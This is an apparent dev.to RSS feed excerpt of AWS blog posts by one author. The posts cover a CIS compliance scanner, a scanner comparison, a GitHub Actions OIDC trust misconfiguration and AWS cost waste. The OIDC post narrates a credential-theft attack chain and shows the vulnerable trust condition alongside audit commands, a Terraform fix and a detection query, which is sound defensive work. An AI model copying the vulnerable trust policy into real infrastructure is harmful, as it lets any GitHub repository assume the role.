&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Compliance Assessment
CIS Amazon Web Services Foundations Benchmark v3.0.0

Readiness: 45%  (25/55 assessed controls passing)
Coverage: 62 controls total, 55 assessed, 7 not assessed

 Status  ID      Title                                          Checks
 PASS    1.4     Ensure no root access key exists                  1/1
 PASS    1.5     Ensure MFA is enabled for root                    1/1
 FAIL    1.6     Ensure hardware MFA for root                      0/1
 FAIL    1.8     Ensure password policy min length 14              0/1
 ...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For the HTML report with full evidence and remediation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cloud-audit scan &lt;span class="nt"&gt;--compliance&lt;/span&gt; cis_aws_v3 &lt;span class="nt"&gt;--format&lt;/span&gt; html &lt;span class="nt"&gt;-o&lt;/span&gt; cis-report.html
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  What the compliance report includes
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc78gml2w6ixya1hk60ja.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc78gml2w6ixya1hk60ja.png" alt="CIS AWS v3.0 compliance report" width="800" height="594"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Each failing control shows:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Evidence statement&lt;/strong&gt; - what was checked, what was found&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AWS CLI remediation&lt;/strong&gt; - the exact command to fix it&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Terraform code&lt;/strong&gt; - HCL you can copy into your infrastructure&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AWS documentation link&lt;/strong&gt; - the official reference&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Attack chain context&lt;/strong&gt; - if the failure is part of an exploitable attack path&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;For example, a failing CIS 1.8 (password policy) shows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_iam_account_password_policy"&lt;/span&gt; &lt;span class="s2"&gt;"strict"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;minimum_password_length&lt;/span&gt;      &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;14&lt;/span&gt;
  &lt;span class="nx"&gt;require_lowercase_characters&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="nx"&gt;require_uppercase_characters&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="nx"&gt;require_numbers&lt;/span&gt;              &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="nx"&gt;require_symbols&lt;/span&gt;              &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="nx"&gt;password_reuse_prevention&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;24&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Attack chains in compliance context
&lt;/h2&gt;

&lt;p&gt;Individual CIS benchmark checks operate in isolation. However, the key issue is the combination of failing controls, as these create vulnerable attack paths. Individual findings alone aren't as bad as their combination. Based on findings, the tool can route results to 20 attack chain rules (describing precisely which ones are included).&lt;/p&gt;

&lt;p&gt;For example, if CIS 1.5 (root MFA) fails AND CIS 3.1 (CloudTrail), the scanner will detect error &lt;strong&gt;AC-09: Unmonitored administrator access&lt;/strong&gt; - root has no MFA and there is no audit trail.&lt;/p&gt;

&lt;p&gt;This gives auditors and auditees something CIS checklists don't offer: a risk prioritization view indicating which failures are most important.&lt;/p&gt;

&lt;h2&gt;
  
  
  How it compares to other tools
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Capability&lt;/th&gt;
&lt;th&gt;AWS Security Hub&lt;/th&gt;
&lt;th&gt;Prowler (OSS)&lt;/th&gt;
&lt;th&gt;cloud-audit&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CIS v3.0 controls&lt;/td&gt;
&lt;td&gt;37 automated&lt;/td&gt;
&lt;td&gt;62&lt;/td&gt;
&lt;td&gt;62 (55 automated)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remediation per control&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;CIS only&lt;/td&gt;
&lt;td&gt;Every control (CLI + Terraform)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Attack chain detection&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Paid App only&lt;/td&gt;
&lt;td&gt;20 rules (free)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cost&lt;/td&gt;
&lt;td&gt;~$0.001/check&lt;/td&gt;
&lt;td&gt;Free&lt;/td&gt;
&lt;td&gt;Free&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  What is next
&lt;/h2&gt;

&lt;p&gt;CIS is the first framework. SOC 2, BSI C5, ISO 27001, HIPAA, and NIS2 are planned.&lt;/p&gt;

&lt;p&gt;Full documentation: &lt;a href="https://haitmg.pl/cloud-audit/" rel="noopener noreferrer"&gt;haitmg.pl/cloud-audit&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;GitHub: &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;github.com/gebalamariusz/cloud-audit&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;Have you automated your CIS compliance process? What tools are you using? I'd love to hear about your experience in the comments.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>terraform</category>
      <category>opensource</category>
    </item>
    <item>
      <title>Prowler vs ScoutSuite vs cloud-audit [2026]</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Wed, 18 Mar 2026 14:17:03 +0000</pubDate>
      <link>https://dev.to/haitmg/prowler-vs-scoutsuite-vs-cloud-audit-2026-2i55</link>
      <guid>https://dev.to/haitmg/prowler-vs-scoutsuite-vs-cloud-audit-2026-2i55</guid>
      <description>&lt;p&gt;As of 2026, we can find many open source tools that scan AWS accounts for potentially unsafe configurations. Anyone who cares about the security of their AWS infrastructure has likely already searched for such tools and stumbled upon &lt;a href="https://github.com/prowler-cloud/prowler" rel="noopener noreferrer"&gt;Prowler&lt;/a&gt;, &lt;a href="https://github.com/nccgroup/ScoutSuite" rel="noopener noreferrer"&gt;ScoutSuite&lt;/a&gt;, Trivy, Steampipe, and a few others while browsing "best tools" rankings.&lt;/p&gt;

&lt;p&gt;I've used most of them myself. I've seen both pros and cons. This prompted me to dedicate the time to creating my own scanner. In this post, I'd like to compare three CLI-based scanners - Prowler, ScoutSuite, and &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;Cloud-Audit&lt;/a&gt; (my tool). I'll try to be as objective as possible, but I'll let the comparison speak for itself.&lt;/p&gt;

&lt;p&gt;Each solves different problems at different scales. I'll point out where each scanner fits and where it doesn't.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://haitmg.pl/blog/aws-security-scanners-compared/" rel="noopener noreferrer"&gt;haitmg.pl&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://haitmg.pl/blog/aws-security-scanners-compared/" rel="noopener noreferrer"&gt;Read the full article with comparison table and code examples on haitmg.pl&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>devops</category>
      <category>opensource</category>
    </item>
    <item>
      <title>I Audit AWS Accounts. 8 Out of 10 Have This GitHub Actions Backdoor.</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Mon, 16 Mar 2026 11:17:54 +0000</pubDate>
      <link>https://dev.to/haitmg/i-audit-aws-accounts-8-out-of-10-have-this-github-actions-backdoor-4g9k</link>
      <guid>https://dev.to/haitmg/i-audit-aws-accounts-8-out-of-10-have-this-github-actions-backdoor-4g9k</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt; Configuring GitHub Actions OIDC is very convenient and useful, but often dangerous. If you didn't consider one specific IAM requirement and created a role before June 2025, you're almost certainly vulnerable to an attack that would allow ANY GitHub repository to assume your AWS deployment role.&lt;/p&gt;




&lt;p&gt;The title sounds scary and clickbait, right? Unfortunately, only the second part of the question is false. It's not clickbait. Last week, Google published details about a threat group called UNC6426. A single compromised npm package allowed access to full AWS admin within 72 hours. How was this possible? Well, a poisoned npm package stole the developer's GitHub token. From there, the path was clear - going directly to production on AWS, password-free and alert-free.&lt;/p&gt;

&lt;p&gt;The door they used? It's probably open in your account right now.&lt;/p&gt;

&lt;h2&gt;
  
  
  How a single npm install led to AWS admin
&lt;/h2&gt;

&lt;p&gt;Let's take a look at the attack process and try to understand it in simple terms. One developer came to work on Monday morning and made a to-do list for the day. The first task required installing an npm package, just like any other, from a trusted registry. The problem was that this package contained a credential-stealing script called QUIETVAULT. It worked by silently extracting the developer's personal GitHub token.&lt;/p&gt;

&lt;p&gt;The attackers intercepted the token and easily used it to gain access to the organization's GitHub repository. The next step was to use the open-source Nord Stream tool to extract secrets from CI/CD. Further, after searching, they found the GitHub Actions workflow deployed to AWS using OIDC. OIDC is a "modern" and secure authentication method without the need to store access keys.&lt;/p&gt;

&lt;p&gt;Sound bad? We're just getting started. The AWS rule used by GitHub Actions was configured so that any GitHub repo could use it. ALL of them, not just those belonging to the organization.&lt;/p&gt;

&lt;p&gt;So what did the attackers do with this? They generated temporary AWS credentials by exploiting a misconfigured OIDC. Next, CloudFormation was deployed with the ability to create a completely new IAM role with admin access. There were no login credentials? So they created their own.&lt;/p&gt;

&lt;p&gt;All this took less than 72 hours.&lt;/p&gt;

&lt;p&gt;Datadog Security Labs detected over 500 roles with the exact same misconfiguration across ~275 AWS accounts. You know how? By scanning public GitHub workflows. One of them belonged to the British government's digital service...&lt;/p&gt;

&lt;h2&gt;
  
  
  What's OIDC and why should you care
&lt;/h2&gt;

&lt;p&gt;Anyone with a passing understanding of security knows to use OIDC when connecting GitHub Actions to AWS. This approach allows communication without the need to store long-term confidential information. And that's great, that's the point. It just needs to be configured correctly.&lt;/p&gt;

&lt;p&gt;You're only as secure as your permission rules that control who can use them. Configuring them incorrectly? You've left the door wide open to a potential burglar.&lt;/p&gt;

&lt;p&gt;Consider a real-life analogy. You installed the most armor-resistant door in your house. Not even an explosive device can break it down. And then you hung the key to that door on the doorknob.&lt;/p&gt;

&lt;h2&gt;
  
  
  The vulnerability - one missing line
&lt;/h2&gt;

&lt;p&gt;Here's what I find in roughly 8 out of 10 client accounts. Look at the &lt;code&gt;Condition&lt;/code&gt; block:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="nl"&gt;"Condition"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringEquals"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:aud"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Professional and secure, eh? Well, almost, because there's only one condition to check - audience. This only confirms that the token is intended for AWS, but does it mention who's presenting it?&lt;/p&gt;

&lt;p&gt;Now look at the secure version:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="nl"&gt;"Condition"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringEquals"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:aud"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"repo:my-org/my-repo:ref:refs/heads/main"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One line. Adding the &lt;code&gt;sub&lt;/code&gt; claim condition locks the role down to a specific repository and branch.&lt;/p&gt;

&lt;p&gt;Without that, you can think of it like this: you go to a concert, go through a series of personal checks, and then hand in your ticket for verification. The security guard looks at you - you have a ticket, come on in. He just didn't check if it was a ticket for this concert...&lt;/p&gt;

&lt;h2&gt;
  
  
  Check your account in 60 seconds
&lt;/h2&gt;

&lt;p&gt;Stop reading and run this. Find all roles that trust GitHub's OIDC provider but are missing the &lt;code&gt;sub&lt;/code&gt; condition:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws iam list-roles &lt;span class="nt"&gt;--output&lt;/span&gt; json | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'
  .Roles[]
  | select(
      .AssumeRolePolicyDocument.Statement[]
      | select(.Principal.Federated? // empty
        | endswith("token.actions.githubusercontent.com"))
      | (.Condition.StringEquals["token.actions.githubusercontent.com:sub"] //
         .Condition.StringLike["token.actions.githubusercontent.com:sub"]) == null
    )
  | "\(.RoleName) -- VULNERABLE"'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you see output - you have a problem.&lt;/p&gt;

&lt;p&gt;To inspect a specific role:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws iam get-role &lt;span class="nt"&gt;--role-name&lt;/span&gt; YOUR_ROLE_NAME &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'Role.AssumeRolePolicyDocument'&lt;/span&gt; &lt;span class="nt"&gt;--output&lt;/span&gt; json | jq &lt;span class="nb"&gt;.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No &lt;code&gt;sub&lt;/code&gt; condition in the output = vulnerable.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Terraform fix
&lt;/h2&gt;

&lt;p&gt;Don't use &lt;code&gt;jsonencode()&lt;/code&gt; for this policy. Duplicate map keys in HCL silently overwrite each other - this exact bug hit the UK Government Digital Service. Use &lt;code&gt;aws_iam_policy_document&lt;/code&gt; instead:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;data&lt;/span&gt; &lt;span class="s2"&gt;"aws_iam_policy_document"&lt;/span&gt; &lt;span class="s2"&gt;"github_actions_trust"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;statement&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;effect&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Allow"&lt;/span&gt;
    &lt;span class="nx"&gt;actions&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"sts:AssumeRoleWithWebIdentity"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

    &lt;span class="nx"&gt;principals&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Federated"&lt;/span&gt;
      &lt;span class="nx"&gt;identifiers&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;aws_iam_openid_connect_provider&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;arn&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="nx"&gt;condition&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;test&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"StringEquals"&lt;/span&gt;
      &lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"token.actions.githubusercontent.com:aud"&lt;/span&gt;
      &lt;span class="nx"&gt;values&lt;/span&gt;   &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="nx"&gt;condition&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;test&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"StringLike"&lt;/span&gt;
      &lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"token.actions.githubusercontent.com:sub"&lt;/span&gt;
      &lt;span class="nx"&gt;values&lt;/span&gt;   &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"repo:YOUR_ORG/YOUR_REPO:ref:refs/heads/main"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_iam_role"&lt;/span&gt; &lt;span class="s2"&gt;"github_actions"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;               &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"GitHubActionsRole"&lt;/span&gt;
  &lt;span class="nx"&gt;assume_role_policy&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;aws_iam_policy_document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;github_actions_trust&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;json&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two separate &lt;code&gt;condition&lt;/code&gt; blocks. No silent overwrites. No surprises.&lt;/p&gt;

&lt;h2&gt;
  
  
  What AWS fixed (and what they didn't)
&lt;/h2&gt;

&lt;p&gt;Back in June 2025, AWS introduced an additional security measure that blocks the creation of new roles without this condition. If you configure it incorrectly, it's an error.&lt;/p&gt;

&lt;p&gt;That's probably a no-brainer, right?&lt;/p&gt;

&lt;p&gt;No, exactly. This security measure only applies to new roles. Pay attention to your OIDC roles created before June 2025. If you didn't fix it yourself, AWS didn't fix it for you either.&lt;/p&gt;

&lt;h2&gt;
  
  
  Did someone already exploit this?
&lt;/h2&gt;

&lt;p&gt;If you use CloudTrail Lake, run this query to find any role assumptions from repos outside your organization:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;eventTime&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;userIdentity&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;username&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;github_subject&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="n"&gt;sourceIPAddress&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;your&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="k"&gt;data&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;store&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;eventSource&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'sts.amazonaws.com'&lt;/span&gt;
  &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;eventName&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'AssumeRoleWithWebIdentity'&lt;/span&gt;
  &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;userIdentity&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;username&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;LIKE&lt;/span&gt; &lt;span class="s1"&gt;'repo:YOUR-GITHUB-ORG/%'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you see results - someone outside your org already used your role. Time to rotate credentials and check what they accessed.&lt;/p&gt;

&lt;h2&gt;
  
  
  One more thing
&lt;/h2&gt;

&lt;p&gt;I'm currently working on additional functionality to detect this configuration in my AWS &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;cloud-audit&lt;/a&gt; security scanner (it's completely open source). Any detection of this error will be included in a report, along with comments on how to fix it. If you'd like, please add a star to &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;the repo&lt;/a&gt;; it will help me develop and encourage further work.&lt;/p&gt;

&lt;p&gt;This year, I've audited dozens of accounts, and the ratio of vulnerable to secure is alarming - I bet most of you won't like the answer.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Sources: &lt;a href="https://securitylabs.datadoghq.com/articles/exploring-github-to-aws-keyless-authentication-flaws/" rel="noopener noreferrer"&gt;Datadog Security Labs&lt;/a&gt;, &lt;a href="https://cloud.google.com/security/report/resources/cloud-threat-horizons-report-h1-2026" rel="noopener noreferrer"&gt;Google Cloud Threat Horizons H1 2026&lt;/a&gt;, &lt;a href="https://aws.amazon.com/blogs/security/use-iam-roles-to-connect-github-actions-to-actions-in-aws/" rel="noopener noreferrer"&gt;AWS Security Blog&lt;/a&gt;, &lt;a href="https://www.wiz.io/blog/avoiding-mistakes-with-aws-oidc-integration-conditions" rel="noopener noreferrer"&gt;Wiz Blog&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>githubactions</category>
      <category>devops</category>
    </item>
    <item>
      <title>AWS Cost Waste: 5 Things I Find in Every Audit</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Fri, 13 Mar 2026 22:08:57 +0000</pubDate>
      <link>https://dev.to/haitmg/aws-cost-waste-5-things-i-find-in-every-audit-1o89</link>
      <guid>https://dev.to/haitmg/aws-cost-waste-5-things-i-find-in-every-audit-1o89</guid>
      <description>&lt;p&gt;&lt;strong&gt;AWS cost waste&lt;/strong&gt; is money spent on cloud resources that deliver zero value - orphaned volumes, logs stored forever, idle databases, and infrastructure nobody remembers deploying. In most accounts, it adds up to 27-35% of the total bill.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Waste pattern&lt;/th&gt;
&lt;th&gt;Typical annual cost&lt;/th&gt;
&lt;th&gt;Fix effort&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Orphaned EBS volumes&lt;/td&gt;
&lt;td&gt;$2,000+ per TB&lt;/td&gt;
&lt;td&gt;1 Terraform line&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;CloudWatch logs without retention&lt;/td&gt;
&lt;td&gt;15% of monthly bill&lt;/td&gt;
&lt;td&gt;1 CLI command per log group&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Unnecessary NAT Gateways&lt;/td&gt;
&lt;td&gt;$1,166/year per 3-AZ setup&lt;/td&gt;
&lt;td&gt;Conditional Terraform&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;gp2 volumes instead of gp3&lt;/td&gt;
&lt;td&gt;20% of EBS spend&lt;/td&gt;
&lt;td&gt;In-place migration, zero downtime&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Over-provisioned RDS&lt;/td&gt;
&lt;td&gt;$350+/month per idle instance&lt;/td&gt;
&lt;td&gt;Environment-aware sizing&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;According to a Flexera report, organizations waste 27% of their cloud spending. I have mixed feelings about this. In the audits I've conducted throughout my career, the result has more often been closer to 35%. Never mind the numbers. More important is the fact that almost no one notices wasted money until they actually check it.&lt;/p&gt;

&lt;p&gt;Interestingly, these aren't some exotic edge cases. The same pattern usually repeats itself - five similar problems for every customer. In this article, I present a list of the most common cases.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Orphaned EBS volumes
&lt;/h2&gt;

&lt;p&gt;Did you have EC2 for testing? Great. Did you test everything you needed to? Even better. Did you shut down the instances? Well, you're clearly a professional who cares about costs. But wait... Did you really select "terminate EBS on shutdown"? Oh, no? And you've probably tested hundreds of instances over the last year? Let's do the math. Let's be optimistic, you had 50 of these instances. The cost is 0.08-0.10 USD per GB per month. Let's not bother with the math; I'll leave that to you.&lt;/p&gt;

&lt;p&gt;One audit reported 2.4 TB of orphaned volumes (across three regions). $2.3k just went "into the cloud" and nobody actually noticed. But who's going to stop a rich man?&lt;/p&gt;

